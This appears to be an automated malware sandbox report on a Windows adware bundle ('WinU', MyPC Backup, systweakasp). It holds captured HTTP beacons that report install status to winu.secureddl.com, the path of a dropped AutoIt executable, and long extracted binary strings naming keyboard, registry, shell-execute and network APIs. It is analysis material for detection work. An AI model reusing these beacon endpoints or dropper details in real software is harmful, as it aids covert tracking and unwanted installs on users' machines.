Set-Cookie: LC_CURRENCY=CA; expires=Sat, 23-Aug-2014 18:28:23 GMT; path=/; domain=.mypcbackup.com<br>
Set-Cookie: ?uva6aT*=CA; expires=Sat, 23-Aug-2014 18:28:23 GMT; path=/; domain=.mypcbackup.com<br>
Content-Length: 8<br>
Connection: close<br>
Content-Type: text/html; charset=UTF-8<br>
Set-Cookie: MPBWWW=640052152.1.1048087472.3333076384; path=/<br><pre>Complete..</pre></font><br><br
<font color="red">GET /DigiCertAssuredIDRootCA.crl HTTP/1.1<br>
Accept: */*<br>
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512<br>
Host: crl4.digicert.com<br>
Connection: Keep-Alive<br>
Cache-Control: no-cache<br>
Pragma: no-cache<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:28:35 GMT<br>
Content-Type: application/x-pkcs7-crl<br>
Content-Length: 535<br>
Connection: keep-alive<br>
X-CFHash: "de6ce907dec8c4de63bbe253349ec40e"<br>
Last-Modified: Wed, 06 Aug 2014 20:15:03 GMT<br>
X-CF3: H<br>
X-CF2: H<br>
Accept-Ranges: bytes<br>
Server: CFS 0623<br>
X-CF1: 13483:dA.yul1:cf:cacheA.yul1-01:D<br><pre>0...0.....0...*.H........0e1.0...U....US1.0...U....DigiCert Inc1.0...U<br>....VVV.digicert.com1$0"..U....DigiCert Assured ID Root CA..1408061900<br>00Z..140827190000Z010/....................061110000100Z0.0...U........<br>00.0...U.#..0...E.......1-Q...!..m..0...U........0...*.H..............<br>.]............z..g..c.c7..Y.......4......j...7...Pb.D..ry.,]......B'z.<br>.@&&.Wh.E..k...gIu...?q.E....*.6~.}[email protected]*.....Q0....."p..p.}..q......<br>.e..)vqM*.?w1k..].o.o?z.>H.M...&..7.7O- #...9.t2.F..n.D.V.....<.<br>{.^..t.J .w.K.....}E2.m!......d....42.......eY..}....</pre></font><br><br
<font color="red">GET /stats/winUSet.php?install_adminTask_fail=true HTTP/1.1<br>
Accept: */*<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: winu.secureddl.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:28:12 GMT<br>
Server: Apache<br>
Vary: Accept-Encoding<br>
Content-Encoding: gzip<br>
Content-Length: 25<br>
Content-Type: text/html<br><pre>[email protected]/1.1 200 OK..Date: Wed, 13 Aug 2014 18:28<br>:12 GMT..Server: Apache..Vary: Accept-Encoding..Content-Encoding: gzip<br>..Content-Length: 25..Content-Type: text/[email protected]..<br>....</pre></font><br><br
<font color="red">GET /stats/partenaires/mypcbackupSet.php?download_success=true HTTP/1.1<br>
Accept: */*<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: winu.secureddl.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:28:17 GMT<br>
Server: Apache<br>
Vary: Accept-Encoding<br>
Content-Encoding: gzip<br>
Content-Length: 25<br>
Content-Type: text/html<br><pre>[email protected]......</pre></font><br><br
<font color="red">GET /stats/configuration/time_range HTTP/1.1<br>
User-Agent: AutoIt<br>
Host: winu.secureddl.com<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:28:03 GMT<br>
Server: Apache<br>
Last-Modified: Fri, 01 Aug 2014 08:56:23 GMT<br>
ETag: "400606-2-4ff8d9048bbc0"<br>
Accept-Ranges: bytes<br>
Content-Length: 2<br>
Content-Type: text/plain<br><pre>31</font>....</pre></font><br><br><font color="red">GET /stats/systemTaskSet.php?adminTask_absent=true HTTP/1.1<br>
Accept: */*<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: winu.secureddl.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:28:04 GMT<br>
Server: Apache<br>
Vary: Accept-Encoding<br>
Content-Encoding: gzip<br>
Content-Length: 25<br>
Content-Type: text/html<br><pre>[email protected]....</font>....</pre></font><br><br><font color="red">GET /stats/systemTaskSet.php?multiSession=true HTTP/1.1<br>
Accept: */*<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: winu.secureddl.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:28:07 GMT<br>
Server: Apache<br>
Vary: Accept-Encoding<br>
Content-Encoding: gzip<br>
Content-Length: 25<br>
Content-Type: text/html<br><pre>[email protected]....</font>....</pre></font><br><br><font color="red">GET /stats/systemTaskSet.php?browser_other=true HTTP/1.1<br>
Accept: */*<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: winu.secureddl.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:28:09 GMT<br>
Server: Apache<br>
Vary: Accept-Encoding<br>
Content-Encoding: gzip<br>
Content-Length: 25<br>
Content-Type: text/html<br><pre>[email protected]....</font>....</pre></font><br><br><font color="red">GET /stats/systemTaskSet.php?os_winXp_X86=true HTTP/1.1<br>
Accept: */*<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: winu.secureddl.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:28:12 GMT<br>
Server: Apache<br>
Vary: Accept-Encoding<br>
Content-Encoding: gzip<br>
Content-Length: 25<br>
Content-Type: text/html<br><pre>[email protected]....</font>....</pre></font><br><br><font color="red">GET /stats/systemTaskSet.php?pays_other=true HTTP/1.1<br>
Accept: */*<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: winu.secureddl.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:28:15 GMT<br>
Server: Apache<br>
Vary: Accept-Encoding<br>
Content-Encoding: gzip<br>
Content-Length: 25<br>
Content-Type: text/html<br><pre>[email protected]......</pre></font><br><br
The Worm connects to the servers at the folowing location(s):
`.rsrc
PSSSSSSh
Gt.Ht$
t.jGZf;
PSSShD
PVSShD
f;Crt
?#%X.y
GetProcessWindowStation
operator
This is a compiled AutoIt script. AV researchers please email [email protected] for support.
kernel32.dll
oleaut32.dll
RegDeleteKeyExW
advapi32.dll
Error text not found (please report)
operand of unlimited repeat could match the empty string
POSIX named classes are supported only within a class
erroffset passed as NULL
POSIX collating elements are not supported
this version of PCRE is compiled without UTF support
PCRE does not support \L, \l, \N{name}, \U, or \usupport for \P, \p, and \X has not been compiled
this version of PCRE is not compiled with Unicode property support
\N is not supported in a class
zcÁ
GetProcessHeap
CreatePipe
GetWindowsDirectoryW
GetCPInfo
RegDeleteKeyW
RegEnumKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegCloseKey
SetViewportOrgEx
ShellExecuteExW
SHFileOperationW
ShellExecuteW
RegisterHotKey
GetKeyboardLayoutNameW
ExitWindowsEx
EnumThreadWindows
UnregisterHotKey
keybd_event
GetAsyncKeyState
SetKeyboardState
GetKeyboardState
GetKeyState
VkKeyScanW
EnumWindows
EnumChildWindows
MapVirtualKeyW
CloseWindowStation
SetProcessWindowStation
OpenWindowStationW
InternetCrackUrlW
HttpQueryInfoW
HttpOpenRequestW
HttpSendRequestW
FtpOpenFileW
FtpGetFileSize
InternetOpenUrlW
##@,&,//,))
.jQG2
4`%ud*
3(-,'')-*/%'
9(***3).**-)'
H%d=j@
0!;....(
.text
`.rdata
@.data
.rsrc
@.reloc
@.MN4
n..GGHHH
n...GGHHH
n ....HGHHHH
n ....G.HHH
~~~~{~{{{{n!! ....HGHHHH
n!! .....HHHHHH
!!! ....GGHHH
!!"".....HHHHnv
"""...-.nv
jLØ
8i.oK
].eH?
u_.xJzz
>D.jC
=%X8q
B@~5.DO
.WNU}`**
Ys.fP
.ER =*
.hc00
>.zaA h8
R.kzr
9n%fwL
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" language="*" processorArchitecture="*" publicKeyToken="6595b64144ccf1df"/>
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>KERNEL32.DLL
ADVAPI32.dll
COMCTL32.dll
COMDLG32.dll
GDI32.dll
IPHLPAPI.DLL
MPR.dll
ole32.dll
OLEAUT32.dll
PSAPI.DLL
SHELL32.dll
USER32.dll
USERENV.dll
UxTheme.dll
VERSION.dll
WININET.dll
WINMM.dll
WSOCK32.dll
mscoree.dll
combase.dll
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
USER32.DLL
>>>AUTOIT NO CMDEXECUTE<<<
CMDLINERAW
CMDLINE
/AutoIt3ExecuteLine
/AutoIt3ExecuteScript
APPSKEY
789:;<=>?
FTPSETPROXY
GUICTRLRECVMSG
GUICTRLSENDMSG
GUIGETMSG
GUIREGISTERMSG
HOTKEYSET
HTTPSETPROXY
HTTPSETUSERAGENT
ISKEYWORD
MSGBOX
REGENUMKEY
SHELLEXECUTE
SHELLEXECUTEWAIT
TCPACCEPT
TCPCLOSESOCKET
TCPCONNECT
TCPLISTEN
TCPNAMETOIP
TCPRECV
TCPSEND
TCPSHUTDOWN
TCPSTARTUP
TRAYGETMSG
UDPBIND
UDPCLOSESOCKET
UDPOPEN
UDPRECV
UDPSEND
UDPSHUTDOWN
UDPSTARTUP
SendKeyDelay
SendKeyDownDelay
TCPTimeout
WINDOWSDIR
AUTOITEXE
HOTKEYPRESSED
D%s (%d) : ==> %s.:
Line %d:
Line %d (File "%s"):
%s (%d) : ==> %s:
AutoIt script files (*.au3, *.a3x)
*.au3;*.a3x
All files (*.*)
04090000
%u.%u.%u.%u
0.0.0.0
Mddddd
"%s" (%d) : ==> %s:
\??\%s
GUI_RUNDEFMSG
AUTOITCALLVARIABLE%d
255.255.255.255
Keyword
AUTOIT.ERROR
Null Object assignment in FOR..IN loop
Incorrect Object type in FOR..IN loop
3, 3, 10, 2
HKEY_LOCAL_MACHINE
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_USERS
%d/d/d
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\~ahwapkv.exe
AutoIt supports the __stdcall (WINAPI) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the DllCall() documentation for details on changing the calling convention.
Missing operator in expression."Unbalanced brackets in expression.
Error parsing function call.0Incorrect number of parameters in function call.'"ReDim" used without an array variable.>Illegal text at the end of statement (one statement per line).1"If" statement has no matching "EndIf" statement.1"Else" statement with no matching "If" statement.2"EndIf" statement with no matching "If" statement.7Too many "Else" statements for matching "If" statement.3"While" statement has no matching "Wend" statement.4"Wend" statement with no matching "While" statement.%Variable used without being declared.XArray variable has incorrect number of subscripts or subscript dimension range exceeded.#Variable subscript badly formatted.*Subscript used on non-accessible variable.&Too many subscripts used for an array.0Missing subscript dimensions in "Dim" statement.NNo variable given for "Dim", "Local", "Global", "Struct" or "Const" statement.
0Expected a "=" operator in assignment statement.*Invalid keyword at the start of this line.
Invalid element in a DllStruct.*Unknown option or bad parameter specified.&Unable to load the internet libraries./"Struct" statement has no matching "EndStruct".HUnable to open file, the maximum number of open files has been exceeded.K"ContinueLoop" statement with no matching "While", "Do" or "For" statement.
Invalid file filter given.*Expected a variable in user function call.1"Do" statement has no matching "Until" statement.2"Until" statement with no matching "Do" statement.#"For" statement is badly formatted.2"Next" statement with no matching "For" statement.N"ExitLoop/ContinueLoop" statements only valid from inside a For/Do/While loop.1"For" statement has no matching "Next" statement.@"Case" statement with no matching "Select"or "Switch" statement.:"EndSelect" statement with no matching "Select" statement.ORecursion level has been exceeded - AutoIt will quit to prevent stack overflow.&Cannot make existing variables static.4Cannot make static variables into regular variables.
3This keyword cannot be used after a "Then" keyword.>"Select" statement is missing "EndSelect" or "Case" statement. "If" statements must have a "Then" keyword. Badly formated Struct statement."Cannot assign values to constants..Cannot make existing variables into constants.9Only Object-type variables allowed in a "With" statement.v"long_ptr", "int_ptr" and "short_ptr" DllCall() types have been deprecated. Use "long*", "int*" and "short*" instead.-Object referenced outside a "With" statement.)Nested "With" statements are not allowed."Variable must be of type "Object".1The requested action with this object has failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array variable can not be used in this manner.
Can not redeclare a constant.5Can not redeclare a parameter inside a user function.HCan pass constants by reference only to parameters with "Const" keyword.*Can not initialize a variable with itself.$Incorrect way to use this parameter.:"EndSwitch" statement with no matching "Switch" statement.>"Switch" statement is missing "EndSwitch" or "Case" statement.H"ContinueCase" statement with no matching "Select"or "Switch" statement.
String missing closing quote.!Badly formated variable or macro.*Missing separator character after keyword.
1.0.0.1
hXXp://VVV.autoitscript.com/autoit3/
Aut2Exe
3.3.10.2
~ahwapkv.exe_1512_rwx_00401000_000FB000:
PSSSSSSh
Gt.Ht$
t.jGZf;
PSSShD
PVSShD
f;Crt
?#%X.y
GetProcessWindowStation
operator
This is a compiled AutoIt script. AV researchers please email [email protected] for support.
kernel32.dll
oleaut32.dll
RegDeleteKeyExW
advapi32.dll
Error text not found (please report)
operand of unlimited repeat could match the empty string
POSIX named classes are supported only within a class
erroffset passed as NULL
POSIX collating elements are not supported
this version of PCRE is compiled without UTF support
PCRE does not support \L, \l, \N{name}, \U, or \usupport for \P, \p, and \X has not been compiled
this version of PCRE is not compiled with Unicode property support
\N is not supported in a class
zcÁ
GetProcessHeap
CreatePipe
GetWindowsDirectoryW
GetCPInfo
RegDeleteKeyW
RegEnumKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegCloseKey
SetViewportOrgEx
ShellExecuteExW
SHFileOperationW
ShellExecuteW
RegisterHotKey
GetKeyboardLayoutNameW
ExitWindowsEx
EnumThreadWindows
UnregisterHotKey
keybd_event
GetAsyncKeyState
SetKeyboardState
GetKeyboardState
GetKeyState
VkKeyScanW
EnumWindows
EnumChildWindows
MapVirtualKeyW
CloseWindowStation
SetProcessWindowStation
OpenWindowStationW
InternetCrackUrlW
HttpQueryInfoW
HttpOpenRequestW
HttpSendRequestW
FtpOpenFileW
FtpGetFileSize
InternetOpenUrlW
##@,&,//,))
.jQG2
4`%ud*
3(-,'')-*/%'
9(***3).**-)'
H%d=j@
0!;....(
.text
`.rdata
@.data
.rsrc
@.reloc
@.MN4
mscoree.dll
combase.dll
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
USER32.DLL
>>>AUTOIT NO CMDEXECUTE<<<
CMDLINERAW
CMDLINE
/AutoIt3ExecuteLine
/AutoIt3ExecuteScript
APPSKEY
789:;<=>?
FTPSETPROXY
GUICTRLRECVMSG
GUICTRLSENDMSG
GUIGETMSG
GUIREGISTERMSG
HOTKEYSET
HTTPSETPROXY
HTTPSETUSERAGENT
ISKEYWORD
MSGBOX
REGENUMKEY
SHELLEXECUTE
SHELLEXECUTEWAIT
TCPACCEPT
TCPCLOSESOCKET
TCPCONNECT
TCPLISTEN
TCPNAMETOIP
TCPRECV
TCPSEND
TCPSHUTDOWN
TCPSTARTUP
TRAYGETMSG
UDPBIND
UDPCLOSESOCKET
UDPOPEN
UDPRECV
UDPSEND
UDPSHUTDOWN
UDPSTARTUP
SendKeyDelay
SendKeyDownDelay
TCPTimeout
WINDOWSDIR
AUTOITEXE
HOTKEYPRESSED
D%s (%d) : ==> %s.:
Line %d:
Line %d (File "%s"):
%s (%d) : ==> %s:
AutoIt script files (*.au3, *.a3x)
*.au3;*.a3x
All files (*.*)
04090000
%u.%u.%u.%u
0.0.0.0
Mddddd
"%s" (%d) : ==> %s:
\??\%s
GUI_RUNDEFMSG
AUTOITCALLVARIABLE%d
255.255.255.255
Keyword
AUTOIT.ERROR
Null Object assignment in FOR..IN loop
Incorrect Object type in FOR..IN loop
3, 3, 10, 2
HKEY_LOCAL_MACHINE
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_USERS
%d/d/d
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\~ahwapkv.exe
AutoIt supports the __stdcall (WINAPI) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the DllCall() documentation for details on changing the calling convention.
Missing operator in expression."Unbalanced brackets in expression.
Error parsing function call.0Incorrect number of parameters in function call.'"ReDim" used without an array variable.>Illegal text at the end of statement (one statement per line).1"If" statement has no matching "EndIf" statement.1"Else" statement with no matching "If" statement.2"EndIf" statement with no matching "If" statement.7Too many "Else" statements for matching "If" statement.3"While" statement has no matching "Wend" statement.4"Wend" statement with no matching "While" statement.%Variable used without being declared.XArray variable has incorrect number of subscripts or subscript dimension range exceeded.#Variable subscript badly formatted.*Subscript used on non-accessible variable.&Too many subscripts used for an array.0Missing subscript dimensions in "Dim" statement.NNo variable given for "Dim", "Local", "Global", "Struct" or "Const" statement.
0Expected a "=" operator in assignment statement.*Invalid keyword at the start of this line.
Invalid element in a DllStruct.*Unknown option or bad parameter specified.&Unable to load the internet libraries./"Struct" statement has no matching "EndStruct".HUnable to open file, the maximum number of open files has been exceeded.K"ContinueLoop" statement with no matching "While", "Do" or "For" statement.
Invalid file filter given.*Expected a variable in user function call.1"Do" statement has no matching "Until" statement.2"Until" statement with no matching "Do" statement.#"For" statement is badly formatted.2"Next" statement with no matching "For" statement.N"ExitLoop/ContinueLoop" statements only valid from inside a For/Do/While loop.1"For" statement has no matching "Next" statement.@"Case" statement with no matching "Select"or "Switch" statement.:"EndSelect" statement with no matching "Select" statement.ORecursion level has been exceeded - AutoIt will quit to prevent stack overflow.&Cannot make existing variables static.4Cannot make static variables into regular variables.
3This keyword cannot be used after a "Then" keyword.>"Select" statement is missing "EndSelect" or "Case" statement. "If" statements must have a "Then" keyword. Badly formated Struct statement."Cannot assign values to constants..Cannot make existing variables into constants.9Only Object-type variables allowed in a "With" statement.v"long_ptr", "int_ptr" and "short_ptr" DllCall() types have been deprecated. Use "long*", "int*" and "short*" instead.-Object referenced outside a "With" statement.)Nested "With" statements are not allowed."Variable must be of type "Object".1The requested action with this object has failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array variable can not be used in this manner.
Can not redeclare a constant.5Can not redeclare a parameter inside a user function.HCan pass constants by reference only to parameters with "Const" keyword.*Can not initialize a variable with itself.$Incorrect way to use this parameter.:"EndSwitch" statement with no matching "Switch" statement.>"Switch" statement is missing "EndSwitch" or "Case" statement.H"ContinueCase" statement with no matching "Select"or "Switch" statement.
String missing closing quote.!Badly formated variable or macro.*Missing separator character after keyword.
MyPC Backup.exe_892_rwx_054E0000_00010000:
$6y%C
systweakasp.exe_3000:
.text
`.itext
`.data
.idata
.rdata
@.rsrc
ENoMonitorSupportException
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
Inno Setup Setup Data (5.5.0) (u)
Inno Setup Messages (5.5.3) (u)
oleaut32.dll
advapi32.dll
RegOpenKeyExW
RegCloseKey
user32.dll
GetKeyboardType
kernel32.dll
MsgWaitForMultipleObjects
ExitWindowsEx
GetWindowsDirectoryW
GetCPInfo
comctl32.dll
KWindows
6MsgIDs
Msgs
name="JR.Inno.Setup"
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>.DEFAULT\Control Panel\International
File I/O error %d
lzmadecompsmall: Compressed data is corrupted (%d)
lzmadecompsmall: %s
LzmaDecode failed (%d)
/SUPPRESSMSGBOXES
/PASSWORD=password
Specifies the password to use.
For more detailed information, please visit hXXp://VVV.jrsoftware.org/ishelp/index.php?topic=setupcmdline
shell32.dll
/SL5="$%x,%d,%d,
Invalid file name - %s
Invalid variant operation
External exception %x
Interface not supported
Object lock not owned(Monitor support function not initialized
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
I/O error %d
Integer overflow Invalid floating point operation
Invalid pointer operation
2.1.1.67
systweakasp.tmp_3164:
.text
`.itext
`.data
.idata
.rdata
@.rsrc
Windows
ENoMonitorSupportException
.uvCOu
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
Uh.xB
EInvalidGraphicOperation
UhU%C
Uh%.C
PasswordChart
OnKeyDownTME
OnKeyPress
OnKeyUpPLE
ssHorizontal
OnKeyUp
TCustomButton.TButtonStyle
AutoHotkeysP
AutoHotkeys
TKeyEvent
TKeyPressEvent
HelpKeyword
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
EXPORT
TPSExec
TPSRuntimeClassImporterPkP
TPSExportedVar
TPSCustomDebugExec
TPSDebugExec
OnKeyUptKE
Uh.pJ
t.Htb
Uh.kK
1.2.1
TPasswordEdit
PasswordEdit(
Passwordt
PasswordPage
PasswordLabel
PasswordEdit
PasswordEditLabel
Uh.cL
CheckPassword
<requestedExecutionLevel level="
IMsg
FormKeyDown
PasswordCheckHash
TKeyNameConst
TOutputMsgWizardPage
TOutputMsgMemoWizardPage
MsgLabel
Msg1Label
Msg2Label
function CreateOutputMsgPage(const AfterID: Integer; const ACaption, ADescription, AMsg: String): TOutputMsgWizardPage;
function CreateOutputMsgMemoPage(const AfterID: Integer; const ACaption, ADescription, ASubCaption: String; const AMsg: AnsiString): TOutputMsgMemoWizardPage;
function MsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons: Integer): Integer;
function GetIniString(const Section, Key, Default, Filename: String): String;
function GetIniInt(const Section, Key: String; const Default, Min, Max: Longint; const Filename: String): Longint;
function GetIniBool(const Section, Key: String; const Default: Boolean; const Filename: String): Boolean;
function IniKeyExists(const Section, Key, Filename: String): Boolean;
function SetIniString(const Section, Key, Value, Filename: String): Boolean;
function SetIniInt(const Section, Key: String; const Value: Longint; const Filename: String): Boolean;
function SetIniBool(const Section, Key: String; const Value: Boolean; const Filename: String): Boolean;
procedure DeleteIniEntry(const Section, Key, Filename: String);
function GetCmdTail: String;
function StringChangeEx(var S: String; const FromStr, ToStr: String; const SupportDBCS: Boolean): Integer;
function RegValueExists(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;
function RegQueryStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;
function RegQueryMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;
function RegDeleteKeyIncludingSubkeys(const RootKey: Integer; const SubkeyName: String): Boolean;
function RegDeleteKeyIfEmpty(const RootKey: Integer; const SubkeyName: String): Boolean;
function RegKeyExists(const RootKey: Integer; const SubKeyName: String): Boolean;
function RegDeleteValue(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;
function RegGetSubkeyNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;
function RegGetValueNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;
function RegQueryDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultDWord: Cardinal): Boolean;
function RegQueryBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: AnsiString): Boolean;
function RegWriteStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteExpandStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: Cardinal): Boolean;
function RegWriteBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: AnsiString): Boolean;
function CheckForMutexes(Mutexes: String): Boolean;
function Exec(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;
function ExecAsOriginalUser(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;
function ShellExec(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;
function ShellExecAsOriginalUser(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;
function MakePendingFileRenameOperationsChecksum: String;
function CreateShellLink(const Filename, Description, ShortcutTo, Parameters, WorkingDir, IconFilename: String; const IconIndex, ShowCmd: Integer): String;
function ExitSetupMsgBox: Boolean;
function GetWindowsVersion: Cardinal;
procedure GetWindowsVersionEx(var Version: TWindowsVersion);
function GetWindowsVersionString: String;
function SuppressibleMsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons, Default: Integer): Integer;
function CustomMessage(const MsgName: String): String;
function SendMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Longint;
function PostMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;
function SendNotifyMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;
function SendBroadcastMessage(const Msg, WParam, LParam: Longint): Longint;
function PostBroadcastMessage(const Msg, WParam, LParam: Longint): Boolean;
function SendBroadcastNotifyMessage(const Msg, WParam, LParam: Longint): Boolean;
procedure RaiseException(const Msg: String);
function SetPreviousData(const PreviousDataKey: Integer; const ValueName, ValueData: String): Boolean;
CREATEOUTPUTMSGPAGE
CREATEOUTPUTMSGMEMOPAGE
MSGBOX
INIKEYEXISTS
GETCMDTAIL
REGKEYEXISTS
REGDELETEKEYINCLUDINGSUBKEYS
REGDELETEKEYIFEMPTY
REGGETSUBKEYNAMES
CHECKFORMUTEXES
SHELLEXEC
SHELLEXECASORIGINALUSER
MAKEPENDINGFILERENAMEOPERATIONSCHECKSUM
EXITSETUPMSGBOX
GETWINDOWSVERSION
GETWINDOWSVERSIONSTRING
SUPPRESSIBLEMSGBOX
GetWindowsVersionEx
IMsgt
Inno Setup Setup Data (5.5.0) (u)
Inno Setup Messages (5.5.3) (u)
oleaut32.dll
advapi32.dll
RegOpenKeyExW
RegCloseKey
user32.dll
GetKeyboardType
kernel32.dll
UnhookWindowsHookEx
SetWindowsHookExW
MsgWaitForMultipleObjectsEx
MsgWaitForMultipleObjects
MapVirtualKeyW
LoadKeyboardLayoutW
GetKeyboardState
GetKeyboardLayoutNameW
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextW
ExitWindowsEx
EnumWindows
EnumThreadWindows
EnumChildWindows
ActivateKeyboardLayout
msimg32.dll
gdi32.dll
SetViewportOrgEx
version.dll
mpr.dll
TransactNamedPipe
SetNamedPipeHandleState
GetWindowsDirectoryW
GetCPInfo
CreateNamedPipeW
RegQueryInfoKeyW
RegFlushKey
RegEnumKeyExW
RegDeleteKeyW
RegCreateKeyExW
comctl32.dll
ole32.dll
shell32.dll
ShellExecuteExW
ShellExecuteW
comdlg32.dll
`.rdata
@.data
.pdata
COMCTL32.dll
